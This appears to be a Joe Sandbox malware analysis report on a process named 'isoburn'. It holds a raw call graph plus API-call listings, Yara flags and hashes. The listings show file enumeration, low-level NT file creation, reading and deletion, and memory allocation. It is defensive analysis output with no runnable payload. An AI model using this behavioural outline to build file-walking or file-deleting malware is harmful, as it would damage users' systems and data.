2ed24cc 98545 2ed250b 98544->98545 98547 2ed24d3 98544->98547 98546 2ed5c20 3 API calls 98545->98546 98549 2ed2533 98545->98549 98546->98549 98548 2ed4120 LdrLoadDll 98547->98548 98548->98545 98552 2ec99c0 98555 2ec9ef3 98552->98555 98554 2eca31e 98555->98554 98556 2ee6c40 98555->98556 98557 2ee6c66 98556->98557 98564 2ed3050 98557->98564 98559 2ee6c72 98560 2ee6ca0 98559->98560 98567 2ee34f0 98559->98567 98571 2ee54e0 LdrLoadDll 98560->98571 98563 2ee6cb1 98563->98554 98566 2ed305d 98564->98566 98572 2ed2fa0 98564->98572 98566->98559 98568 2ee354a 98567->98568 98570 2ee3557 98568->98570 98597 2ed1f10 98568->98597 98570->98560 98571->98563 98579 2ee2040 98572->98579 98576 2ed2fc3 98578 2ed2fd0 98576->98578 98586 2ee5b20 98576->98586 98578->98566 98580 2ee204f 98579->98580 98581 2ee0b80 LdrLoadDll 98580->98581 98582 2ed2fb7 98581->98582 98583 2ee20a0 98582->98583 98593 2ee5400 98583->98593 98588 2ee5b38 98586->98588 98587 2ee5b5c 98587->98578 98588->98587 98589 2ee48e0 2 API calls 98588->98589 98590 2ee5bb1 98589->98590 98591 2ee6fb0 2 API calls 98590->98591 98592 2ee5bc7 98591->98592 98592->98578 98594 2ee541a 98593->98594 98595 2ee6190 LdrLoadDll 98594->98595 98596 2ee20bd 98595->98596 98596->98576 98598 2ed1f29 98597->98598 98615 2ed7140 98598->98615 98600 2ed1f50 98601 2ed21a9 98600->98601 98602 2ee7090 2 API calls 98600->98602 98601->98570 98603 2ed1f66 98602->98603 98604 2ee7090 2 API calls 98603->98604 98605 2ed1f77 98604->98605 98606 2ee7090 2 API calls 98605->98606 98607 2ed1f88 98606->98607 98627 2ed5770 98607->98627 98609 2ed1ff0 98614 2ed201b 98609->98614 98657 2ed6380 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98609->98657 98611 2ed1f95 98611->98609 98656 2ed58f0 LdrLoadDll 98611->98656 98637 2ed1a10 98614->98637 98616 2ed716c 98615->98616 98658 2ed44b0 98616->98658 98618 2ed717e 98662 2ed7030 98618->98662 98621 2ed7199 98623 2ee5180 2 API calls 98621->98623 98624 2ed71a4 98621->98624 98622 2ed71b1 98625 2ee5180 2 API 
calls 98622->98625 98626 2ed71c2 98622->98626 98623->98624 98624->98600 98625->98626 98626->98600 98628 2ed5786 98627->98628 98629 2ed5790 98627->98629 98628->98611 98630 2ed4400 LdrLoadDll 98629->98630 98631 2ed5829 98630->98631 98632 2ed4340 LdrLoadDll 98631->98632 98634 2ed583d 98632->98634 98633 2ed5863 98633->98611 98634->98633 98635 2ed4400 LdrLoadDll 98634->98635 98636 2ed588a 98635->98636 98636->98611 98683 2ed7400 98637->98683 98639 2ed1a2a 98649 2ed1ef8 98639->98649 98689 2ee0090 98639->98689 98641 2ed1a88 98641->98649 98692 2ee8090 98641->98692 98643 2ed1c31 98644 2ee81c0 3 API calls 98643->98644 98645 2ed1c46 98644->98645 98652 2ed1c5c 98645->98652 98697 2ed01f0 98645->98697 98646 2ed01f0 4 API calls 98646->98652 98648 2ed73a0 2 API calls 98648->98652 98649->98601 98650 2ed1d13 98650->98652 98710 2ed04b0 98650->98710 98652->98646 98652->98648 98652->98649 98654 2ed04b0 2 API calls 98652->98654 98653 2ed73a0 LdrLoadDll LdrInitializeThunk 98655 2ed1d8a 98653->98655 98654->98652 98655->98652 98655->98653 98656->98609 98657->98614 98659 2ed44f6 98658->98659 98660 2ed4340 LdrLoadDll 98659->98660 98661 2ed4589 98660->98661 98661->98618 98663 2ed7126 98662->98663 98664 2ed704a 98662->98664 98663->98621 98663->98622 98665 2ed4400 LdrLoadDll 98664->98665 98666 2ed708f 98665->98666 98672 2ee4930 98666->98672 98668 2ed70d4 98676 2ee4980 98668->98676 98671 2ee5180 2 API calls 98671->98663 98673 2ee494d 98672->98673 98674 2ee6190 LdrLoadDll 98673->98674 98675 2ee495e 98674->98675 98675->98668 98677 2ee499d 98676->98677 98678 2ee6190 LdrLoadDll 98677->98678 98679 2ee49ae 98678->98679 98682 54435c0 LdrInitializeThunk 98679->98682 98680 2ed711a 98680->98671 98682->98680 98684 2ed7408 98683->98684 98685 2ee0b80 LdrLoadDll 98684->98685 98686 2ed7427 98685->98686 98687 2ed742e SetErrorMode 98686->98687 98688 2ed7435 98686->98688 98687->98688 98688->98639 98690 2ee6f20 2 API calls 98689->98690 98691 2ee00b1 98690->98691 98691->98641 98693 2ee80a6 98692->98693 98694 2ee80a0 
98692->98694 98695 2ee7090 2 API calls 98693->98695 98694->98643 98696 2ee80cc 98695->98696 98696->98643 98698 2ed01fb 98697->98698 98699 2ed0200 98697->98699 98698->98650 98700 2ee6f20 2 API calls 98699->98700 98703 2ed0225 98700->98703 98701 2ed028c 98701->98650 98703->98701 98704 2ed0292 98703->98704 98707 2ee6f20 2 API calls 98703->98707 98713 2ee4890 98703->98713 98719 2ee53b0 98703->98719 98706 2ed02bc 98704->98706 98708 2ee53b0 2 API calls 98704->98708 98706->98650 98707->98703 98709 2ed02ad 98708->98709 98709->98650 98711 2ee53b0 2 API calls 98710->98711 98712 2ed04d2 98711->98712 98712->98655 98714 2ee48ad 98713->98714 98715 2ee6190 LdrLoadDll 98714->98715 98716 2ee48be 98715->98716 98725 5442df0 LdrInitializeThunk 98716->98725 98717 2ee48d5 98717->98703 98720 2ee53ca 98719->98720 98721 2ee6190 LdrLoadDll 98720->98721 98722 2ee53db 98721->98722 98726 5442c70 LdrInitializeThunk 98722->98726 98723 2ee53f2 98723->98703 98725->98717 98726->98723 98727 2ede840 98728 2ede8a4 98727->98728 98729 2ed4400 LdrLoadDll 98728->98729 98730 2ede997 98729->98730 98731 2ed5c20 3 API calls 98730->98731 98733 2ede9cd 98731->98733 98732 2ede9d4 98733->98732 98734 2ed4400 LdrLoadDll 98733->98734 98735 2edea10 98734->98735 98736 2ed5d30 2 API calls 98735->98736 98738 2edea50 98736->98738 98737 2edeb73 98738->98737 98739 2edeb82 98738->98739 98761 2ede620 98738->98761 98740 2ee5180 2 API calls 98739->98740 98742 2edeb8c 98740->98742 98743 2edea85 98743->98739 98744 2edea90 98743->98744 98745 2ee7090 2 API calls 98744->98745 98746 2edeab9 98745->98746 98747 2edead8 98746->98747 98748 2edeac2 98746->98748 98790 2ede510 CoInitialize 98747->98790 98749 2ee5180 2 API calls 98748->98749 98751 2edeacc 98749->98751 98752 2edeae6 98792 2ee4ce0 98752->98792 98754 2edeb62 98755 2ee5180 2 API calls 98754->98755 98756 2edeb6c 98755->98756 98758 2ee6fb0 2 API calls 98756->98758 98758->98737 98759 2edeb04 98759->98754 98760 2ee4ce0 2 API calls 98759->98760 98798 2ede440 LdrLoadDll RtlFreeHeap 
98759->98798 98760->98759 98762 2ede63c 98761->98762 98763 2ed4120 LdrLoadDll 98762->98763 98765 2ede65a 98763->98765 98764 2ede663 98764->98743 98765->98764 98766 2ee0b80 LdrLoadDll 98765->98766 98767 2ede680 98766->98767 98768 2ee0b80 LdrLoadDll 98767->98768 98769 2ede69b 98768->98769 98770 2ee0b80 LdrLoadDll 98769->98770 98771 2ede6b4 98770->98771 98772 2ee0b80 LdrLoadDll 98771->98772 98773 2ede6d0 98772->98773 98774 2ee0b80 LdrLoadDll 98773->98774 98775 2ede6e9 98774->98775 98776 2ee0b80 LdrLoadDll 98775->98776 98777 2ede702 98776->98777 98778 2ed4120 LdrLoadDll 98777->98778 98780 2ede72e 98778->98780 98779 2ede7dd 98779->98743 98780->98779 98781 2ee0b80 LdrLoadDll 98780->98781 98782 2ede753 98781->98782 98783 2ed4120 LdrLoadDll 98782->98783 98784 2ede788 98783->98784 98784->98779 98785 2ee0b80 LdrLoadDll 98784->98785 98786 2ede7ab 98785->98786 98787 2ee0b80 LdrLoadDll 98786->98787 98788 2ede7c4 98787->98788 98789 2ee0b80 LdrLoadDll 98788->98789 98789->98779 98791 2ede575 98790->98791 98791->98752 98793 2ee4cfa 98792->98793 98794 2ee6190 LdrLoadDll 98793->98794 98795 2ee4d0b 98794->98795 98799 5442ba0 LdrInitializeThunk 98795->98799 98796 2ee4d2a 98796->98759 98798->98759 98799->98796 98800 2edc3c0 98801 2edc3e2 98800->98801 98802 2ed4400 LdrLoadDll 98801->98802 98803 2edc5d3 98802->98803 98804 2ed4400 LdrLoadDll 98803->98804 98805 2edc5f8 98804->98805 98806 2ed4340 LdrLoadDll 98805->98806 98807 2edc60c 98806->98807 98831 2edc280 98807->98831 98810 2edc280 6 API calls 98811 2edc682 98810->98811 98812 2edc280 6 API calls 98811->98812 98813 2edc69a 98812->98813 98814 2edc280 6 API calls 98813->98814 98815 2edc6b2 98814->98815 98816 2edc280 6 API calls 98815->98816 98817 2edc6cd 98816->98817 98818 2edc280 6 API calls 98817->98818 98820 2edc6e5 98818->98820 98819 2edc6ff 98820->98819 98821 2edc280 6 API calls 98820->98821 98822 2edc733 98821->98822 98823 2edc280 6 API calls 98822->98823 98824 2edc770 98823->98824 98825 2edc280 6 API calls 98824->98825 98826 2edc7ad 
98825->98826 98827 2edc280 6 API calls 98826->98827 98828 2edc7ea 98827->98828 98829 2edc280 6 API calls 98828->98829 98830 2edc827 98829->98830 98832 2edc2a9 98831->98832 98833 2ee0b80 LdrLoadDll 98832->98833 98834 2edc2e9 98833->98834 98835 2ee0b80 LdrLoadDll 98834->98835 98836 2edc307 98835->98836 98837 2ee0b80 LdrLoadDll 98836->98837 98839 2edc329 98837->98839 98838 2edc3ad 98838->98810 98839->98838 98840 2edc353 FindFirstFileW 98839->98840 98840->98838 98841 2edc36e 98840->98841 98842 2edc394 FindNextFileW 98841->98842 98845 2edc190 6 API calls 98841->98845 98842->98841 98843 2edc3a6 FindClose 98842->98843 98843->98838 98845->98841 98846 2ee0a80 98850 2ee0a8f 98846->98850 98847 2ee0ad3 98848 2ee6fb0 2 API calls 98847->98848 98849 2ee0ae3 98848->98849 98850->98847 98851 2ee0b11 98850->98851 98853 2ee0b16 98850->98853 98852 2ee6fb0 2 API calls 98851->98852 98852->98853 98854 2ee5100 98855 2ee5152 98854->98855 98856 2ee5124 98854->98856 98857 2ee6190 LdrLoadDll 98855->98857 98858 2ee6190 LdrLoadDll 98856->98858 98860 2ee5168 NtDeleteFile 98857->98860 98859 2ee513e 98858->98859 98861 2ed2e9c 98862 2ed7030 3 API calls 98861->98862 98863 2ed2eac 98862->98863 98864 2ed2eda 98863->98864 98865 2ed2ec1 98863->98865 98867 2ee5180 2 API calls 98863->98867 98869 2ecf910 LdrLoadDll 98865->98869 98867->98865 98868 2ed2ecb 98869->98868 98871 2ed54d8 98872 2ed546d 98871->98872 98873 2ed54db 98871->98873 98874 2ee48e0 2 API calls 98872->98874 98875 2ed5476 98874->98875 98876 2ee5220 2 API calls 98875->98876 98877 2ed548b 98876->98877 98878 2ed66d0 98879 2ed66fe 98878->98879 98880 2ed71d0 3 API calls 98879->98880 98881 2ed6726 98880->98881 98882 2ed672d 98881->98882 98883 2ee70d0 2 API calls 98881->98883 98884 2ed673d 98883->98884 98885 2ed4c50 98888 2ed4c7a 98885->98888 98886 2ed50e8 98887 2ee0090 2 API calls 98889 2ed4d19 98887->98889 98888->98886 98888->98887 98889->98886 98911 2ed0a50 9 API calls 98889->98911 98891 2ed4d87 98891->98886 98892 2ee6fb0 2 API calls 98891->98892 
98894 2ed4d9f 98892->98894 98893 2ed4dd1 98895 2ed71d0 3 API calls 98893->98895 98899 2ed4dd8 98893->98899 98894->98893 98930 2ec39f0 LdrLoadDll LdrInitializeThunk 98894->98930 98896 2ed4e11 98895->98896 98896->98886 98898 2ee4a80 2 API calls 98896->98898 98898->98899 98899->98886 98912 2ee4570 98899->98912 98901 2ed4e6e 98921 2ee45f0 98901->98921 98903 2ed5077 98906 2ee46f0 2 API calls 98903->98906 98907 2ed509a 98903->98907 98904 2ed4e8e 98904->98903 98931 2ec3a60 LdrLoadDll LdrInitializeThunk 98904->98931 98906->98907 98908 2ed73a0 2 API calls 98907->98908 98909 2ed50b7 98907->98909 98908->98907 98932 2ee54e0 LdrLoadDll 98909->98932 98911->98891 98913 2ee4591 98912->98913 98914 2ee45c3 98912->98914 98915 2ee6190 LdrLoadDll 98913->98915 98916 2ee6190 LdrLoadDll 98914->98916 98917 2ee45ab 98915->98917 98918 2ee45d9 98916->98918 98917->98901 98933 54439b0 LdrInitializeThunk 98918->98933 98919 2ee45e8 98919->98901 98922 2ee4646 98921->98922 98923 2ee4614 98921->98923 98924 2ee6190 LdrLoadDll 98922->98924 98925 2ee6190 LdrLoadDll 98923->98925 98926 2ee465c 98924->98926 98927 2ee462e 98925->98927 98934 5444340 LdrInitializeThunk 98926->98934 98927->98904 98928 2ee466b 98928->98904 98930->98893 98931->98903 98932->98886 98933->98919 98934->98928 98935 2ee4f10 98936 2ee4f8a 98935->98936 98937 2ee4f34 98935->98937 98938 2ee6190 LdrLoadDll 98936->98938 98939 2ee6190 LdrLoadDll 98937->98939 98941 2ee4fa0 NtCreateFile 98938->98941 98940 2ee4f4e 98939->98940 98942 2ee0251 98956 2ee5040 98942->98956 98944 2ee0272 98948 2ee0289 98944->98948 98963 2ee4e20 LdrLoadDll 98944->98963 98946 2ee02a5 98950 2ee5180 2 API calls 98946->98950 98947 2ee0290 98949 2ee5180 2 API calls 98947->98949 98948->98946 98948->98947 98951 2ee0299 98949->98951 98953 2ee02ae 98950->98953 98952 2ee02da 98953->98952 98954 2ee6fb0 2 API calls 98953->98954 98955 2ee02ce 98954->98955 98957 2ee5064 98956->98957 98958 2ee50b2 98956->98958 98960 2ee6190 LdrLoadDll 98957->98960 98959 2ee6190 LdrLoadDll 
98958->98959 98961 2ee50c8 NtReadFile 98959->98961 98962 2ee507e 98960->98962 98961->98944 98962->98944 98963->98948

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$'$,$,i$/$/a$1$2$8W$9$9$@F$DN$E$E$H$H%$L&$N$OW$P$Q$Rf$T$Ut$V$V>$YC$\1$\b$]$]$^$^C$`!$cF$h$ls$m$D$P$a\b
                                                                          • API String ID: 0-2954206845
                                                                          • Opcode ID: 7bb0eb9fc51504e8f0df5f11d87c5573e519a5e9ea5ee8551a2a0024a50f4def
                                                                          • Instruction ID: 123bd0e4768bbff1a555b3f1b240360a7de0a4ade2f6ccb5713857d42d1d14ce
                                                                          • Opcode Fuzzy Hash: 7bb0eb9fc51504e8f0df5f11d87c5573e519a5e9ea5ee8551a2a0024a50f4def
                                                                          • Instruction Fuzzy Hash: 9C52BFB0D45669CBEB24CF85C9987EDBBB1BB45308F2091D9D40D6B380C7BA5A89CF44
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 02EDC364
                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02EDC39F
                                                                          • FindClose.KERNELBASE(00000000), ref: 02EDC3AA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: e5a8113a24b97868ad254099b4ce76d3a16e60903e4235b5ab03e4c1fc8c4a56
                                                                          • Instruction ID: fcfb052667272b99468d70fbb43011605e7db559d2bf389199b6a81b8f14c37a
                                                                          • Opcode Fuzzy Hash: e5a8113a24b97868ad254099b4ce76d3a16e60903e4235b5ab03e4c1fc8c4a56
                                                                          • Instruction Fuzzy Hash: AF31A3719402087BDB20DBA0CC85FFF777CAF44749F24959DF509A7180EA70AA85CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID: ,
                                                                          • API String ID: 2340568224-3772416878
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02EE4FD1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02EE50F1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtAllocateVirtualMemory.NTDLL(02ED1A88,?,02ED21A9,00000000,00000004,00003000,00000004,00000000,02ED21A9,?,02ED1A88,02ED21A9,?), ref: 02EE5356
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateMemoryVirtual
                                                                          • String ID:
                                                                          • API String ID: 2167126740-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02EE51B7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2ec0000_isoburn.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 53a3178378bddfe8fdbc54dc91144161e6064f4d40716063d0fd884db2650b24
                                                                          • Instruction ID: bae0e0127c2a8f3e4fcf0e93a749cbd5b6a7ca97387b733f67c7e8f3e8c49e84
                                                                          • Opcode Fuzzy Hash: 53a3178378bddfe8fdbc54dc91144161e6064f4d40716063d0fd884db2650b24
                                                                          • Instruction Fuzzy Hash: EF90026234140442D10071584454B460015C7F1311FA5C016F5064554E8B19CD526526
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054F9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.00000000054FD000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_53d0000_isoburn.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4b44c80ace3a5e639855dec4c9620fbd952c53146f71ce116af358a3037a389e
                                                                          • Instruction ID: ad1c899f3fdf5bf937d8bde3aa1351b9a6fd2a7e9eb9d8b058db069b4ed211c0
                                                                          • Opcode Fuzzy Hash: 4b44c80ace3a5e639855dec4c9620fbd952c53146f71ce116af358a3037a389e
                                                                          • Instruction Fuzzy Hash: 65900222211C0042D20075684C54B47001587E0313FA5C116B4154554DCE158D615921
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
